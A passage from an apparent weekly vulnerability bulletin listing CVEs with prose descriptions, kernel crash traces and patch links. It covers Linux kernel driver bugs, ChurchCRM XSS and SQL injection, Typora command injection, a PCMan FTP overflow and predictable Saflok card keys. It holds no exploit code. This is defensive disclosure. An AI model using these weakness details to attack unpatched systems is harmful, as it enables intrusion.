| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: gs_usb: gs_usb_xmit_callback(): fix handling of failed transmitted URBs The driver lacks the cleanup of failed transfers of URBs. This reduces the number of available URBs per error by 1. This leads to reduced performance and ultimately to a complete stop of the transmission. If the sending of a bulk URB fails do proper cleanup: - increase netdev stats - mark the echo_sbk as free - free the driver's context and do accounting - wake the send queue | 2025-12-16 | not yet calculated | CVE-2025-68307 | https://git.kernel.org/stable/c/f7a5560675bd85efaf16ab01a43053670ff2b000 https://git.kernel.org/stable/c/1a588c40a422a3663a52f1c5535e8fb6b044167d https://git.kernel.org/stable/c/4a82072e451eacf24fc66a445e906f5095d215db https://git.kernel.org/stable/c/9c8eb33b7008178b6ce88aa7593d12063ce60ca3 https://git.kernel.org/stable/c/516a0cd1c03fa266bb67dd87940a209fd4e53ce7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: kvaser_usb: leaf: Fix potential infinite loop in command parsers The `kvaser_usb_leaf_wait_cmd()` and `kvaser_usb_leaf_read_bulk_callback` functions contain logic to zero-length commands. These commands are used to align data to the USB endpoint's wMaxPacketSize boundary. The driver attempts to skip these placeholders by aligning the buffer position `pos` to the next packet boundary using `round_up()` function. However, if zero-length command is found exactly on a packet boundary (i.e., `pos` is a multiple of wMaxPacketSize, including 0), `round_up` function will return the unchanged value of `pos`. This prevents `pos` to be increased, causing an infinite loop in the parsing logic. This patch fixes this in the function by using `pos + 1` instead. This ensures that even if `pos` is on a boundary, the calculation is based on `pos + 1`, forcing `round_up()` to always return the next aligned boundary. | 2025-12-16 | not yet calculated | CVE-2025-68308 | https://git.kernel.org/stable/c/58343e0a4d43699f0e2f5b169384bbe4c0217add https://git.kernel.org/stable/c/69c7825df64e24dc15d31631a1fc9145324b1345 https://git.kernel.org/stable/c/028e89c7e8b4346302e88df01cc50e0a1f05791a https://git.kernel.org/stable/c/e9dd83a75a7274edef21682c823bf0b66d7b6b7f https://git.kernel.org/stable/c/0897cea266e39166a36111059ba147192b36592f https://git.kernel.org/stable/c/bd8135a560cf6e64f0b98ed4daadf126a38f7f48 https://git.kernel.org/stable/c/0c73772cd2b8cc108d5f5334de89ad648d89b9ec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI/AER: Fix NULL pointer access by aer_info The kzalloc(GFP_KERNEL) may return NULL, so all accesses to aer_info->xxx will result in kernel panic. Fix it. | 2025-12-16 | not yet calculated | CVE-2025-68309 | https://git.kernel.org/stable/c/6618243bcc3f60825f761a41ed65fef9fe97eb25 https://git.kernel.org/stable/c/0a27bdb14b028fed30a10cec2f945c38cb5ca4fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/pci: Avoid deadlock between PCI error recovery and mlx5 crdump Do not block PCI config accesses through pci_cfg_access_lock() when executing the s390 variant of PCI error recovery: Acquire just device_lock() instead of pci_dev_lock() as powerpc's EEH and generic PCI AER processing do. During error recovery testing a pair of tasks was reported to be hung: mlx5_core 0000:00:00.1: mlx5_health_try_recover:338:(pid 5553): health recovery flow aborted, PCI reads still not working INFO: task kmcheck:72 blocked for more than 122 seconds. Not tainted 5.14.0-570.12.1.bringup7.el9.s390x #1 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:kmcheck state:D stack:0 pid:72 tgid:72 ppid:2 flags:0x00000000 Call Trace: [<000000065256f030>] __schedule+0x2a0/0x590 [<000000065256f356>] schedule+0x36/0xe0 [<000000065256f572>] schedule_preempt_disabled+0x22/0x30 [<0000000652570a94>] __mutex_lock.constprop.0+0x484/0x8a8 [<000003ff800673a4>] mlx5_unload_one+0x34/0x58 [mlx5_core] [<000003ff8006745c>] mlx5_pci_err_detected+0x94/0x140 [mlx5_core] [<0000000652556c5a>] zpci_event_attempt_error_recovery+0xf2/0x398 [<0000000651b9184a>] __zpci_event_error+0x23a/0x2c0 INFO: task kworker/u1664:6:1514 blocked for more than 122 seconds. Not tainted 5.14.0-570.12.1.bringup7.el9.s390x #1 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:kworker/u1664:6 state:D stack:0 pid:1514 tgid:1514 ppid:2 flags:0x00000000 Workqueue: mlx5_health0000:00:00.0 mlx5_fw_fatal_reporter_err_work [mlx5_core] Call Trace: [<000000065256f030>] __schedule+0x2a0/0x590 [<000000065256f356>] schedule+0x36/0xe0 [<0000000652172e28>] pci_wait_cfg+0x80/0xe8 [<0000000652172f94>] pci_cfg_access_lock+0x74/0x88 [<000003ff800916b6>] mlx5_vsc_gw_lock+0x36/0x178 [mlx5_core] [<000003ff80098824>] mlx5_crdump_collect+0x34/0x1c8 [mlx5_core] [<000003ff80074b62>] mlx5_fw_fatal_reporter_dump+0x6a/0xe8 [mlx5_core] [<0000000652512242>] devlink_health_do_dump.part.0+0x82/0x168 [<0000000652513212>] devlink_health_report+0x19a/0x230 [<000003ff80075a12>] mlx5_fw_fatal_reporter_err_work+0xba/0x1b0 [mlx5_core] No kernel log of the exact same error with an upstream kernel is available - but the very same deadlock situation can be constructed there, too: - task: kmcheck mlx5_unload_one() tries to acquire devlink lock while the PCI error recovery code has set pdev->block_cfg_access by way of pci_cfg_access_lock() - task: kworker mlx5_crdump_collect() tries to set block_cfg_access through pci_cfg_access_lock() while devlink_health_report() had acquired the devlink lock. A similar deadlock situation can be reproduced by requesting a crdump with > devlink health dump show pci/<BDF> reporter fw_fatal while PCI error recovery is executed on the same <BDF> physical function by mlx5_core's pci_error_handlers. On s390 this can be injected with > zpcictl --reset-fw <BDF> Tests with this patch failed to reproduce that second deadlock situation, the devlink command is rejected with "kernel answers: Permission denied" - and we get a kernel log message of: mlx5_core 1ed0:00:00.1: mlx5_crdump_collect:50:(pid 254382): crdump: failed to lock vsc gw err -5 because the config read of VSC_SEMAPHORE is rejected by the underlying hardware. Two prior attempts to address this issue have been discussed and ultimately rejected [see link], with the primary argument that s390's implementation of PCI error recovery is imposing restrictions that neither powerpc's EEH nor PCI AER handling need. Tests show that PCI error recovery on s390 is running to completion even without blocking access to PCI config space. | 2025-12-16 | not yet calculated | CVE-2025-68310 | https://git.kernel.org/stable/c/d0df2503bc3c2be385ca2fd96585daad1870c7c5 https://git.kernel.org/stable/c/b63c061be622b17b495cbf78a6d5f2d4c3147f8e https://git.kernel.org/stable/c/3591d56ea9bfd3e7fbbe70f749bdeed689d415f9 https://git.kernel.org/stable/c/54f938d9f5693af8ed586a08db4af5d9da1f0f2d https://git.kernel.org/stable/c/0fd20f65df6aa430454a0deed8f43efa91c54835 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tty: serial: ip22zilog: Use platform device for probing After commit 84a9582fd203 ("serial: core: Start managing serial controllers to enable runtime PM") serial drivers need to provide a device in struct uart_port.dev otherwise an oops happens. To fix this issue for ip22zilog driver switch driver to a platform driver and setup the serial device in sgi-ip22 code. | 2025-12-16 | not yet calculated | CVE-2025-68311 | https://git.kernel.org/stable/c/460e0dc9af2d7790d5194c6743d79f9b77b58836 https://git.kernel.org/stable/c/77a196ca904d66c8372aa8fbfc1c4ae3a66dee2e https://git.kernel.org/stable/c/3fc36ae6abd263a5cbf93b2f5539eccc1fc753f7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usbnet: Prevents free active kevent The root causes of this issue are: 1. When probing the usbnet device, executing usbnet_link_change(dev, 0, 0); puts the kevent work in the global workqueue. However, the kevent has not yet been scheduled when the usbnet device is unregistered. Therefore, executing free_netdev() results in the "free active object (kevent)" error reported here. 2. Another factor is that when calling usbnet_disconnect()->unregister_netdev(), if the usbnet device is up, ndo_stop() is executed to cancel the kevent. However, because the device is not up, ndo_stop() is not executed. The solution to this problem is to cancel the kevent before executing free_netdev(). | 2025-12-16 | not yet calculated | CVE-2025-68312 | https://git.kernel.org/stable/c/285d4b953f2ca03c358f986718dd89ee9bde632e https://git.kernel.org/stable/c/88a38b135d69f5db9024ff6527232f1b51be8915 https://git.kernel.org/stable/c/43005002b60ef3424719ecda16d124714b45da3b https://git.kernel.org/stable/c/3a10619fdefd3051aeb14860e4d4335529b4e94d https://git.kernel.org/stable/c/9a579d6a39513069d298eee70770bbac8a148565 https://git.kernel.org/stable/c/2ce1de32e05445d77fc056f6ff8339cfb78a5f84 https://git.kernel.org/stable/c/5158fb8da162e3982940f30cd01ed77bdf42c6fc https://git.kernel.org/stable/c/420c84c330d1688b8c764479e5738bbdbf0a33de |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/CPU/AMD: Add RDSEED fix for Zen5 There's an issue with RDSEED's 16-bit and 32-bit register output variants on Zen5 which return a random value of 0 "at a rate inconsistent with randomness while incorrectly signaling success (CF=1)". Search the web for AMD-SB-7055 for more detail. Add a fix glue which checks microcode revisions. [ bp: Add microcode revisions checking, rewrite. ] | 2025-12-16 | not yet calculated | CVE-2025-68313 | https://git.kernel.org/stable/c/e980de2ff109dacb6d9d3a77f01b27c467115ecb https://git.kernel.org/stable/c/36ff93e66d0efc46e39fab536a9feec968daa766 https://git.kernel.org/stable/c/607b9fb2ce248cc5b633c5949e0153838992c152 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: make sure last_fence is always updated Update last_fence in the vm-bind path instead of kernel managed path. last_fence is used to wait for work to finish in vm_bind contexts but not used for kernel managed contexts. This fixes a bug where last_fence is not waited on context close leading to faults as resources are freed while in use. Patchwork: https://patchwork.freedesktop.org/patch/680080/ | 2025-12-16 | not yet calculated | CVE-2025-68314 | https://git.kernel.org/stable/c/8ee817ceafba266d9c6f3a09babd2ac7441d9a2b https://git.kernel.org/stable/c/86404a9e3013d814a772ac407573be5d3cd4ee0d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to detect potential corrupted nid in free_nid_list As reported, on-disk footer.ino and footer.nid is the same and out-of-range, let's add sanity check on f2fs_alloc_nid() to detect any potential corruption in free_nid_list. | 2025-12-16 | not yet calculated | CVE-2025-68315 | https://git.kernel.org/stable/c/6b9525596a83cd5b7bbc2c7bd5f9ad9cf5ad60fa https://git.kernel.org/stable/c/adbcb34f03abb89e681a5907c4c3ce4bf224991d https://git.kernel.org/stable/c/8fc6056dcf79937c46c97fa4996cda65956437a9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Fix invalid probe error return value After DME Link Startup, the error return value is set to the MIPI UniPro GenericErrorCode which can be 0 (SUCCESS) or 1 (FAILURE). Upon failure during driver probe, the error code 1 is propagated back to the driver probe function which must return a negative value to indicate an error, but 1 is not negative, so the probe is considered to be successful even though it failed. Subsequently, removing the driver results in an oops because it is not in a valid state. This happens because none of the callers of ufshcd_init() expect a non-negative error code. Fix the return value and documentation to match actual usage. | 2025-12-16 | not yet calculated | CVE-2025-68316 | https://git.kernel.org/stable/c/df96dbe1af7f6591c09f862f1226d3619b07e1b6 https://git.kernel.org/stable/c/a2b32bc1d9e359a9f90d0de6af16699facb10935 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/zctx: check chained notif contexts Send zc only links ubuf_info for requests coming from the same context. There are some ambiguous syz reports, so let's check the assumption on notification completion. | 2025-12-16 | not yet calculated | CVE-2025-68317 | https://git.kernel.org/stable/c/aaafd17d3f4be2c15539359a5b4bfa00237f687f https://git.kernel.org/stable/c/d664a3ce3a604231a0b144c152a3755d03b18b60 https://git.kernel.org/stable/c/ab3ea6eac5f45669b091309f592c4ea324003053 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: thead: th1520-ap: set all AXI clocks to CLK_IS_CRITICAL The AXI crossbar of TH1520 has no proper timeout handling, which means gating AXI clocks can easily lead to bus timeout and thus system hang. Set all AXI clock gates to CLK_IS_CRITICAL. All these clock gates are ungated by default on system reset. In addition, convert all current CLK_IGNORE_UNUSED usage to CLK_IS_CRITICAL to prevent unwanted clock gating. | 2025-12-16 | not yet calculated | CVE-2025-68318 | https://git.kernel.org/stable/c/bdec5e01fc2f3114d1fb1daeb1000911d783c4ae https://git.kernel.org/stable/c/c567bc5fc68c4388c00e11fc65fd14fe86b52070 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netconsole: Acquire su_mutex before navigating configs hierarchy There is a race between operations that iterate over the userdata cg_children list and concurrent add/remove of userdata items through configfs. The update_userdata() function iterates over the nt->userdata_group.cg_children list, and count_extradata_entries() also iterates over this same list to count nodes. Quoting from Documentation/filesystems/configfs.rst: > A subsystem can navigate the cg_children list and the ci_parent pointer > to see the tree created by the subsystem. This can race with configfs' > management of the hierarchy, so configfs uses the subsystem mutex to > protect modifications. Whenever a subsystem wants to navigate the > hierarchy, it must do so under the protection of the subsystem > mutex. Without proper locking, if a userdata item is added or removed concurrently while these functions are iterating, the list can be accessed in an inconsistent state. For example, the list_for_each() loop can reach a node that is being removed from the list by list_del_init() which sets the nodes' .next pointer to point to itself, so the loop will never end (or reach the WARN_ON_ONCE in update_userdata() ). Fix this by holding the configfs subsystem mutex (su_mutex) during all operations that iterate over cg_children. This includes: - userdatum_value_store() which calls update_userdata() to iterate over cg_children - All sysdata_*_enabled_store() functions which call count_extradata_entries() to iterate over cg_children The su_mutex must be acquired before dynamic_netconsole_mutex to avoid potential lock ordering issues, as configfs operations may already hold su_mutex when calling into our code. | 2025-12-16 | not yet calculated | CVE-2025-68319 | https://git.kernel.org/stable/c/ff70aa7e8cf05745fdba7258952a8bedf33ea336 https://git.kernel.org/stable/c/d7d2fcf7ae31471b4e08b7e448b8fd0ec2e06a1b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lan966x: Fix sleeping in atomic context The following warning was seen when we try to connect using ssh to the device. BUG: sleeping function called from invalid context at kernel/locking/mutex.c:575 in_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 104, name: dropbear preempt_count: 1, expected: 0 INFO: lockdep is turned off. CPU: 0 UID: 0 PID: 104 Comm: dropbear Tainted: G W 6.18.0-rc2-00399-g6f1ab1b109b9-dirty #530 NONE Tainted: [W]=WARN Hardware name: Generic DT based system Call trace: unwind_backtrace from show_stack+0x10/0x14 show_stack from dump_stack_lvl+0x7c/0xac dump_stack_lvl from __might_resched+0x16c/0x2b0 __might_resched from __mutex_lock+0x64/0xd34 __mutex_lock from mutex_lock_nested+0x1c/0x24 mutex_lock_nested from lan966x_stats_get+0x5c/0x558 lan966x_stats_get from dev_get_stats+0x40/0x43c dev_get_stats from dev_seq_printf_stats+0x3c/0x184 dev_seq_printf_stats from dev_seq_show+0x10/0x30 dev_seq_show from seq_read_iter+0x350/0x4ec seq_read_iter from seq_read+0xfc/0x194 seq_read from proc_reg_read+0xac/0x100 proc_reg_read from vfs_read+0xb0/0x2b0 vfs_read from ksys_read+0x6c/0xec ksys_read from ret_fast_syscall+0x0/0x1c Exception stack(0xf0b11fa8 to 0xf0b11ff0) 1fa0: 00000001 00001000 00000008 be9048d8 00001000 00000001 1fc0: 00000001 00001000 00000008 00000003 be905920 0000001e 00000000 00000001 1fe0: 0005404c be9048c0 00018684 b6ec2cd8 It seems that we are using a mutex in a atomic context which is wrong. Change the mutex with a spinlock. | 2025-12-16 | not yet calculated | CVE-2025-68320 | https://git.kernel.org/stable/c/5a5d2f7727752b64d13263eacd9f8d08a322e662 https://git.kernel.org/stable/c/c8ab03aa5bd9fd8bfe5d9552d8605826759fdd4d https://git.kernel.org/stable/c/3ac743c60ec502163c435712d527eeced8d83348 https://git.kernel.org/stable/c/0216721ce71252f60d89af49c8dff613358058d3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: page_pool: always add GFP_NOWARN for ATOMIC allocations Driver authors often forget to add GFP_NOWARN for page allocation from the datapath. This is annoying to users as OOMs are a fact of life, and we pretty much expect network Rx to hit page allocation failures during OOM. Make page pool add GFP_NOWARN for ATOMIC allocations by default. | 2025-12-16 | not yet calculated | CVE-2025-68321 | https://git.kernel.org/stable/c/0ec2cd5c58793d0c622797cd5fbe26634b357210 https://git.kernel.org/stable/c/9835a0fd59a1df5ec0740fdab6d50db68e0f10de https://git.kernel.org/stable/c/7613c06ffa89c1e2266fb532e23ef7dfdf269d73 https://git.kernel.org/stable/c/3671a0775952026228ae44e096eb144bca75f8dc https://git.kernel.org/stable/c/ab48dc0e23eb714b3f233f8e8f6deed7df2051f5 https://git.kernel.org/stable/c/f3b52167a0cb23b27414452fbc1278da2ee884fc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: parisc: Avoid crash due to unaligned access in unwinder Guenter Roeck reported this kernel crash on his emulated B160L machine: Starting network: udhcpc: started, v1.36.1 Backtrace: [<104320d4>] unwind_once+0x1c/0x5c [<10434a00>] walk_stackframe.isra.0+0x74/0xb8 [<10434a6c>] arch_stack_walk+0x28/0x38 [<104e5efc>] stack_trace_save+0x48/0x5c [<105d1bdc>] set_track_prepare+0x44/0x6c [<105d9c80>] ___slab_alloc+0xfc4/0x1024 [<105d9d38>] __slab_alloc.isra.0+0x58/0x90 [<105dc80c>] kmem_cache_alloc_noprof+0x2ac/0x4a0 [<105b8e54>] __anon_vma_prepare+0x60/0x280 [<105a823c>] __vmf_anon_prepare+0x68/0x94 [<105a8b34>] do_wp_page+0x8cc/0xf10 [<105aad88>] handle_mm_fault+0x6c0/0xf08 [<10425568>] do_page_fault+0x110/0x440 [<10427938>] handle_interruption+0x184/0x748 [<11178398>] schedule+0x4c/0x190 BUG: spinlock recursion on CPU#0, ifconfig/2420 lock: terminate_lock.2+0x0/0x1c, .magic: dead4ead, .owner: ifconfig/2420, .owner_cpu: 0 While creating the stack trace, the unwinder uses the stack pointer to guess the previous frame to read the previous stack pointer from memory. The crash happens, because the unwinder tries to read from unaligned memory and as such triggers the unalignment trap handler which then leads to the spinlock recursion and finally to a deadlock. Fix it by checking the alignment before accessing the memory. | 2025-12-16 | not yet calculated | CVE-2025-68322 | https://git.kernel.org/stable/c/9ac1f44723f26881b9fe7e69c7bc25397b879155 https://git.kernel.org/stable/c/009270208f76456c2cefcd565da263b90bb2eadb https://git.kernel.org/stable/c/fd9f30d1038ee1624baa17a6ff11effe5f7617cb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: typec: ucsi: fix use-after-free caused by uec->work The delayed work uec->work is scheduled in gaokun_ucsi_probe() but never properly canceled in gaokun_ucsi_remove(). This creates use-after-free scenarios where the ucsi and gaokun_ucsi structure are freed after ucsi_destroy() completes execution, while the gaokun_ucsi_register_worker() might be either currently executing or still pending in the work queue. The already-freed gaokun_ucsi or ucsi structure may then be accessed. Furthermore, the race window is 3 seconds, which is sufficiently long to make this bug easily reproducible. The following is the trace captured by KASAN: ================================================================== BUG: KASAN: slab-use-after-free in __run_timers+0x5ec/0x630 Write of size 8 at addr ffff00000ec28cc8 by task swapper/0/0 ... Call trace: show_stack+0x18/0x24 (C) dump_stack_lvl+0x78/0x90 print_report+0x114/0x580 kasan_report+0xa4/0xf0 __asan_report_store8_noabort+0x20/0x2c __run_timers+0x5ec/0x630 run_timer_softirq+0xe8/0x1cc handle_softirqs+0x294/0x720 __do_softirq+0x14/0x20 ____do_softirq+0x10/0x1c call_on_irq_stack+0x30/0x48 do_softirq_own_stack+0x1c/0x28 __irq_exit_rcu+0x27c/0x364 irq_exit_rcu+0x10/0x1c el1_interrupt+0x40/0x60 el1h_64_irq_handler+0x18/0x24 el1h_64_irq+0x6c/0x70 arch_local_irq_enable+0x4/0x8 (P) do_idle+0x334/0x458 cpu_startup_entry+0x60/0x70 rest_init+0x158/0x174 start_kernel+0x2f8/0x394 __primary_switched+0x8c/0x94 Allocated by task 72 on cpu 0 at 27.510341s: kasan_save_stack+0x2c/0x54 kasan_save_track+0x24/0x5c kasan_save_alloc_info+0x40/0x54 __kasan_kmalloc+0xa0/0xb8 __kmalloc_node_track_caller_noprof+0x1c0/0x588 devm_kmalloc+0x7c/0x1c8 gaokun_ucsi_probe+0xa0/0x840 auxiliary_bus_probe+0x94/0xf8 really_probe+0x17c/0x5b8 __driver_probe_device+0x158/0x2c4 driver_probe_device+0x10c/0x264 __device_attach_driver+0x168/0x2d0 bus_for_each_drv+0x100/0x188 __device_attach+0x174/0x368 device_initial_probe+0x14/0x20 bus_probe_device+0x120/0x150 device_add+0xb3c/0x10fc __auxiliary_device_add+0x88/0x130 ... Freed by task 73 on cpu 1 at 28.910627s: kasan_save_stack+0x2c/0x54 kasan_save_track+0x24/0x5c __kasan_save_free_info+0x4c/0x74 __kasan_slab_free+0x60/0x8c kfree+0xd4/0x410 devres_release_all+0x140/0x1f0 device_unbind_cleanup+0x20/0x190 device_release_driver_internal+0x344/0x460 device_release_driver+0x18/0x24 bus_remove_device+0x198/0x274 device_del+0x310/0xa84 ... The buggy address belongs to the object at ffff00000ec28c00 which belongs to the cache kmalloc-512 of size 512 The buggy address is located 200 bytes inside of freed 512-byte region The buggy address belongs to the physical page: page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x4ec28 head: order:2 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0 flags: 0x3fffe0000000040(head|node=0|zone=0|lastcpupid=0x1ffff) page_type: f5(slab) raw: 03fffe0000000040 ffff000008801c80 dead000000000122 0000000000000000 raw: 0000000000000000 0000000080100010 00000000f5000000 0000000000000000 head: 03fffe0000000040 ffff000008801c80 dead000000000122 0000000000000000 head: 0000000000000000 0000000080100010 00000000f5000000 0000000000000000 head: 03fffe0000000002 fffffdffc03b0a01 00000000ffffffff 00000000ffffffff head: ffffffffffffffff 0000000000000000 00000000ffffffff 0000000000000004 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff00000ec28b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffff00000ec28c00: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb >ffff00000ec28c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ ffff00000ec28d00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff00000ec28d80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ================================================================ ---truncated--- | 2025-12-18 | not yet calculated | CVE-2025-68323 | https://git.kernel.org/stable/c/d8ac85c76a4279979b917d4b2f9c6b07d9783003 https://git.kernel.org/stable/c/a880ef71a1c8da266b88491213c37893e2126489 https://git.kernel.org/stable/c/2b7a0f47aaf2439d517ba0a6b29c66a535302154 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: imm: Fix use-after-free bug caused by unfinished delayed work The delayed work item 'imm_tq' is initialized in imm_attach() and scheduled via imm_queuecommand() for processing SCSI commands. When the IMM parallel port SCSI host adapter is detached through imm_detach(), the imm_struct device instance is deallocated. However, the delayed work might still be pending or executing when imm_detach() is called, leading to use-after-free bugs when the work function imm_interrupt() accesses the already freed imm_struct memory. The race condition can occur as follows: CPU 0(detach thread) | CPU 1 | imm_queuecommand() | imm_queuecommand_lck() imm_detach() | schedule_delayed_work() kfree(dev) //FREE | imm_interrupt() | dev = container_of(...) //USE dev-> //USE Add disable_delayed_work_sync() in imm_detach() to guarantee proper cancellation of the delayed work item before imm_struct is deallocated. | 2025-12-18 | not yet calculated | CVE-2025-68324 | https://git.kernel.org/stable/c/31ab2aad7a7b7501e904a09bf361e44671f66092 https://git.kernel.org/stable/c/48dd41fa2d6c6a0c50e714deeba06ffe7f91961b https://git.kernel.org/stable/c/9e434426cc23ad5e2aad649327b59aea00294b13 https://git.kernel.org/stable/c/ab58153ec64fa3fc9aea09ca09dc9322e0b54a7c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop In cake_drop(), qdisc_tree_reduce_backlog() is used to update the qlen and backlog of the qdisc hierarchy. Its caller, cake_enqueue(), assumes that the parent qdisc will enqueue the current packet. However, this assumption breaks when cake_enqueue() returns NET_XMIT_CN: the parent qdisc stops enqueuing current packet, leaving the tree qlen/backlog accounting inconsistent. This mismatch can lead to a NULL dereference (e.g., when the parent Qdisc is qfq_qdisc). This patch computes the qlen/backlog delta in a more robust way by observing the difference before and after the series of cake_drop() calls, and then compensates the qdisc tree accounting if cake_enqueue() returns NET_XMIT_CN. To ensure correct compensation when ACK thinning is enabled, a new variable is introduced to keep qlen unchanged. | 2025-12-18 | not yet calculated | CVE-2025-68325 | https://git.kernel.org/stable/c/0b6216f9b3d1c33c76f74511026e5de5385ee520 https://git.kernel.org/stable/c/529c284cc2815c8350860e9a31722050fe7117cb https://git.kernel.org/stable/c/3ed6c458530a547ed0c9ea0b02b19bab620be88b https://git.kernel.org/stable/c/9fefc78f7f02d71810776fdeb119a05a946a27cc |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. In versions prior to 6.5.4, there is a Stored Cross-Site Scripting (XSS) vulnerability within the GroupEditor.php page of the application. When a user attempts to create a group role, they can execute malicious JavaScript. However, for this to work, the user must have permission to view and modify groups in the application. Version 6.5.4 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-68399 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-gfxf-w4cg-c54j |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. A SQL Injection vulnerability exists in the legacy endpoint `/Reports/ConfirmReportEmail.php` in ChurchCRM prior to version 6.5.3. Although the feature was removed from the UI, the file remains deployed and reachable directly via URL. This is a classic case of *dead but reachable code*. Any authenticated user - including one with zero assigned permissions - can exploit SQL injection through the `familyId` parameter. Version 6.5.3 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-68400 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-v54g-2pvg-gvp2 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 6.0.0, the application stores user-supplied HTML/JS without sufficient sanitization/encoding. When other users later view this content, attacker-controlled JavaScript executes in their browser (stored XSS). In affected contexts the script can access web origin data and perform privileged actions as the victim. Where session cookies are not marked HttpOnly, the script can read document.cookie, enabling session theft and account takeover. Version 6.0.0 patches the issue. | 2025-12-17 | not yet calculated | CVE-2025-68401 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-phfw-p278-qq7v |
| cvat-ai--cvat | CVAT is an open source interactive video and image annotation tool for computer vision. In versions 2.8.1 through 2.52.0, an attacker with an account on a CVAT instance is able to retrieve the contents of any file system directory accessible to the CVAT server. The exposed information is names of contained files and subdirectories. The contents of files are not accessible. Version 2.53.0 contains a patch. No known workarounds are available. | 2025-12-19 | not yet calculated | CVE-2025-68430 | https://github.com/cvat-ai/cvat/security/advisories/GHSA-3g7v-xjh7-xmqx https://github.com/cvat-ai/cvat/commit/2c24ef0c3f8fd94f6c71cff4eafcf11bfcaa5f91 |
| boscop-fr--orejime | Orejime is a consent manager that focuses on accessibility. On HTML elements handled by Orejime prior to version 2.3.2, one could run malicious code by embedding `javascript:` code within data attributes. When consenting to the related purpose, Orejime would turn data attributes into unprefixed ones (i.e. `data-href` into `href`), thus executing the code. This shouldn't have any impact on most setups, as elements handled by Orejime are generally hardcoded. The problem would only arise if somebody could inject HTML code within pages. The problem has been patched in version 2.3.2. As a workaround, the problem can be fixed outside of Orejime by sanitizing attributes which could contain executable code. | 2025-12-19 | not yet calculated | CVE-2025-68457 | https://github.com/boscop-fr/orejime/security/advisories/GHSA-72mh-hgpm-6384 https://github.com/boscop-fr/orejime/issues/142 https://github.com/boscop-fr/orejime/pull/143 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.1-14, ImageMagick crashes when processing a crafted TIFF file. Version 7.1.1-14 fixes the issue. | 2025-12-18 | not yet calculated | CVE-2025-68469 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fff3-4rp7-px97 |
| TP-Link Systems Inc.--Tapo C200 V3 | A buffer overflow vulnerability exists in the ONVIF XML parser of Tapo C200 V3. An unauthenticated attacker on the same local network segment can send specially crafted SOAP XML requests, causing memory overflow and device crash, resulting in denial-of-service (DoS). | 2025-12-20 | not yet calculated | CVE-2025-8065 | https://www.tp-link.com/us/support/download/tapo-c200/v3/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/4849/ |
Vulnerability Summary for the Week of December 8, 2025
Posted on Monday December 15, 2025
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Unknown--Typora | Typora 1.7.4 contains a command injection vulnerability in the PDF export preferences that allows attackers to execute arbitrary system commands. Attackers can inject malicious commands into the 'run command' input field during PDF export to achieve remote code execution. | 2025-12-12 | 9.8 | CVE-2024-14010 | ExploitDB-51752 Typora Vendor Homepage VulnCheck Advisory: Typora 1.7.4 OS Command Injection via Export PDF Preferences |
| PCMan--FTP Server | PCMan FTP Server 2.0 contains a buffer overflow vulnerability in the 'pwd' command that allows remote attackers to execute arbitrary code. Attackers can send a specially crafted payload during the FTP login process to overwrite memory and potentially gain system access. | 2025-12-12 | 9.8 | CVE-2024-58299 | ExploitDB-51767 PCMan FTP Server Sourceforge Page VulnCheck Advisory: PCMan FTP Server 2.0 Remote Buffer Overflow via 'pwd' Command |
| dormakaba--Dormakaba Saflok System 6000 | Dormakaba Saflok System 6000 contains a predictable key generation algorithm that allows attackers to derive card access keys from a 32-bit unique identifier. Attackers can exploit the deterministic key generation process by calculating valid access keys using a simple mathematical transformation of the card's unique identifier. | 2025-12-12 | 9.8 | CVE-2024-58311 | ExploitDB-51832 Dormakaba Vendor Homepage VulnCheck Advisory: Dormakaba Saflok System 6000 Key Generation Cryptographic Weakness |
